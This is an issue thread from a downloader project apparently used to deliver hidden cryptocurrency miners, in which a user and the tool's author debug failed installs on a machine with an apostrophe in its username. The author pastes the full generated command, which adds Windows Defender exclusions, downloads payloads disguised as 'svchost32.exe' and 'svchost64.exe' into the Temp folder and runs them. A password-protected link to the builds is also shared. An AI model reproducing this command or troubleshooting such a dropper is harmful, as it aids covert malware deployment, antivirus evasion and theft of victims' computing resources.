### ISSUE TITLE
Downloader breaks with ' in username

### ISSUE THREAD

**Issue by JaxGuy** [UnamSanctam/UnamDownloader#8]
A computer failed to download a file to the current directory(Desktop) but it did when I put it in the C: folder. Also, I was using the XMR and ETH miner and I believe they did not download and install because of the name too.

**Comment by JaxGuy** [comment]
I’m not at my pc right now, but I set up the downloader to download 2 files to the current directory and also download and execute the xmrminer and ethminer in the temp folder. When I ran it I didn’t see the 2 files that were supposed to download to the current directory until I put it in the C: drive. Even after I put it in the C: drive the miners didn’t appear to start. I don’t know the exact settings but I enabled install and checked install to system32. I checked with MinerCheck and the miners were not running so I’m assuming that the username messed up the install path of either the downloading and execution of the miners or it just broke the miners not the downloader.

**Comment by UnamSanctam** [comment]
Hmm, there shouldn't be any issues since it's all done by powershell. Can you post the settings you used (make a new one with the same settings you think you have) when you have a computer available?

**Comment by JaxGuy** [comment]
Yeah, do you want me to make a new downloader build or miner? I was able to get both to work on many other computers so I’m pretty sure it’s just this computer.

**Comment by UnamSanctam** [comment]
Downloader build, only real reason the miner wouldn't work was if it only had an old .NET version.

**Comment by JaxGuy** [comment]
I made the downloader build like 3ish days ago, it had 2 executables download to the current directory and then the xmr and eth miner both download and execute in temp. The 2 files that are supposed to download to the current directory didn't download if the path included the user name, C: worked, desktop didn't and temp didn't making the miners not run. I'll be home in an hour or two if you want me to try to make a new build and test, but I'm pretty confident I'll have the exact same result.

**Comment by UnamSanctam** [comment]
Hmm yes I guess it's possible if the cmd replaces %CD% before it gets input into powershell, in which case I believe I'd have to replace the %envkey% variables with $env:endkey or something similar, it is extremely bad practice to include apostrophes or quotations in any identifier which is why I didn't consider it or even knew it was actually allowed.

**Comment by JaxGuy** [comment]
Me neither to be honest. Even if it was possible I wouldn’t think anyone would actually use it in their name but I guess they do.

**Comment by JaxGuy** [comment]
Do you think you're going to be able to fix this? Also I tried using the default XMR and ETH miners without the downloader and I believe they are affected by the same problem.

**Comment by UnamSanctam** [comment]
Yes I've already fixed it but am also working on other things. for it. It don't think the miners should be affected since there is nothing that would be incompatible with apostrophes.

**Comment by UnamSanctam** [comment]
New version has been released, it should work in this one.

**Comment by JaxGuy** [comment]
> 
> 
> New version has been released, it should work in this one.

I tried the new release, it appears the files don't download at all now. I tried native and managed but neither seem to work. I also tried just executing the miners directly and neither seems to be installing.

**Comment by UnamSanctam** [comment]
Hmm it works fine for me, can you send the downloader and miner files here?

**Comment by JaxGuy** [comment]
> 
> 
> Hmm it works fine for me, can you send the downloader and miner files here?

https://file.io/sNfeXNw8ReTY
password: SeCuRePaSsWoRd2!

**Comment by UnamSanctam** [comment]
Hmm, they all work for me just fine.

**Comment by JaxGuy** [comment]
I think the issue might be the ' in the username still.

**Comment by UnamSanctam** [comment]
Maybe, but If that's the case then that must be an inherent problem with WIndows/powershell which Microsoft would have to fix since the username isn't referenced at all except through the environmental variables.

**Comment by JaxGuy** [comment]
Darn, so no way to fix this?

**Comment by UnamSanctam** [comment]
Not if that is indeed the problem since that would be an inherent problem in Windows or powershell which only Microsoft could fix.

I will copy paste what your downloader is calling as an example:
`cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path $env:Temp -ChildPath 'svchost32.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path $env:Temp -ChildPath 'svchost64.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path ($pwd).path -ChildPath 'GPU.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path ($pwd).path -ChildPath 'CPU.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'svchost32.exe') & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'svchost64.exe') & exit`

As you can see it never uses any username anywhere so if there is a problem then that lies within Windows or powershell. Keep in mind that you never execute GPU.exe or CPU.exe just so you know.

**Comment by JaxGuy** [comment]
> 
> 
> Not if that is indeed the problem since that would be an inherent problem in Windows or powershell which only Microsoft could fix.
> 
> I will copy paste what your downloader is calling as an example:
> `cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path $env:Temp -ChildPath 'svchost32.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path $env:Temp -ChildPath 'svchost64.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path ($pwd).path -ChildPath 'GPU.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path ($pwd).path -ChildPath 'CPU.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'svchost32.exe') & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'svchost64.exe') & exit`
> 
> As you can see it never uses any username anywhere so if there is a problem then that lies within Windows or powershell. Keep in mind that you never execute GPU.exe or CPU.exe just so you know.

I know those two never execute that is intentional. The other two are supposed to execute. It seems that it only breaks on this one computer so the only thing I can think of is the ' in the username since that is in most of the paths.

**Comment by UnamSanctam** [comment]
Since the commands doesn't contain anything with username then either the problem is with Windows/powershell or powershell could be disabled or something.

**Comment by JaxGuy** [comment]
> 
> 
> Since the commands doesn't contain anything with username then either the problem is with Windows/powershell or powershell could be disabled or something.

I see, do you have any troubleshooting steps?

**Comment by UnamSanctam** [comment]
You can run the commands manually in powershell to see if you get any reponses.

**Comment by JaxGuy** [comment]
> 
> 
> You can run the commands manually in powershell to see if you get any reponses.

Alright, you want me to run the command you sent above, replacing the download links with the actual ones? Also, do you have a discord?

**Comment by UnamSanctam** [comment]
Yes exactly, though the multi command above should be run in CMD. My Discord is Unam Sanctam#3135

**Comment by JaxGuy** [comment]
> 
> 
> Yes exactly, though the multi command above should be run in CMD. My Discord is Unam Sanctam#3135

Alright, I'll try running it in powershell in a bit. I sent you a friend request on discord.
